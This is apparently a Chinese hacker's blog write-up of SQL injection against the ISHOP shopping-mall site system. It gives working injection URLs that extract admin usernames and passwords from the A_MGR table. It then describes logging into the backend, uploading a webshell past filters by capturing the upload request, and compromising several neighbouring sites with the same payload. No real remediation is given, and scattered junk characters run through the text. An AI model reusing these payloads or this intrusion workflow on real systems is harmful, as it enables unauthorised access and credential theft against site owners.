ISHOP商场建站系统注入漏洞

admin

发现一个注入点
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
4 v* z/ ?7 x( `9 A% z
! ]2 e+ x  R6 A9 O/ F, w习惯性的加’having1=1--
, X  V( g" N: [1 k4 x3 |  E
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—

2 i9 |( A; K$ j, s( ~; T0
% I3 N0 L# d  Q! U, E4 u
爆出Diary_A.dl_Title（这时候很激动啊）

那么继续
( S3 u- `' a0 z% ?0 ~http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—

继续，一直爆下去
* ~: k/ ~$ B4 x. h: w
2 G; \8 q5 `6 g; ?爆到几个字段和表段 但是没找到需要的管理用户的字段
; Z" `0 w+ B) k3 }
蛋疼了 怎么办 然后去后台登陆页看源码
9 T7 K9 d; X. y  `5 V0 i0 P6 v: A- t
0

9 }) s6 ]* R" GInput name= “ADUID”
/ C4 H& \/ K9 v) B( lInput name= “ADPWD”

很幸运 找到了字段那就继续
找到之后开始爆用户
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
/ q6 Q6 n; @1 A+ g( c爆密码
+ z. h! w" V6 N4 ~  A- q0 Fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
测试了下 这个注入点只能爆到文章哪里的表
4 I6 V. \; ~2 j, U
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了

5 W9 b! v2 @/ y  L又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了

473
1 u) g7 N/ e" x& ~& p
' N& A& J9 Q/ N; ^* C! F进后台

0 z  l& P2 D1 C+ y2 C4 u. I0 L
9 _4 Y9 t( B* X) H5 U: S) D; j3 V发现几个上传点 有的地方不能上传 而且防止恶意代码

没办法 各种百度各种找大牛 找到一只好像可以突破的马
) c' O% m9 [  M7 t

3 d( T+ r9 i2 K" E3 C3 o在系统管理那里直接上传 不过没有显示地址

再上传一次 抓包 搞定OK



472
2 S, w! ^" I3 ?. Y8 Y  s
* H( F" J( R0 `9 y$ z; z4 e3 y晚上不行了 去睡觉。。。
第二天刚起床 闲的没事做继续日站吧

% t  [  ~- S2 a8 ?0 Q找个站 就把这个站的旁c扫了下
0 F0 R6 u% g$ F* I
/ Q! c. A, w5 [: `+ N3 O& B% `发现c段也有一个购物站 ，然后还和这个站的模板差不多
7 r: G8 z! E$ E
/ b' S# X4 C- d# G就找到会员登录口测试

'and (select top 1 MGR_UID from A_MGR)>0—
果断爆到了 这时候我很激动 通杀

% K- [) Z, _+ Q% I. r1 T再次翻c段

翻出几个站 都成功拿下
* U9 d  g" k9 t; @
" |/ k6 I8 |& L8 V, m. w
& ?1 Z1 r# b; q3 }
修复方案：
; p/ P; N3 [6 z4 G0 g% l他们比我专业
​
6 y/ v, b8 a; ~" o& ^
4 `+ t& C$ w! {' w. K1 d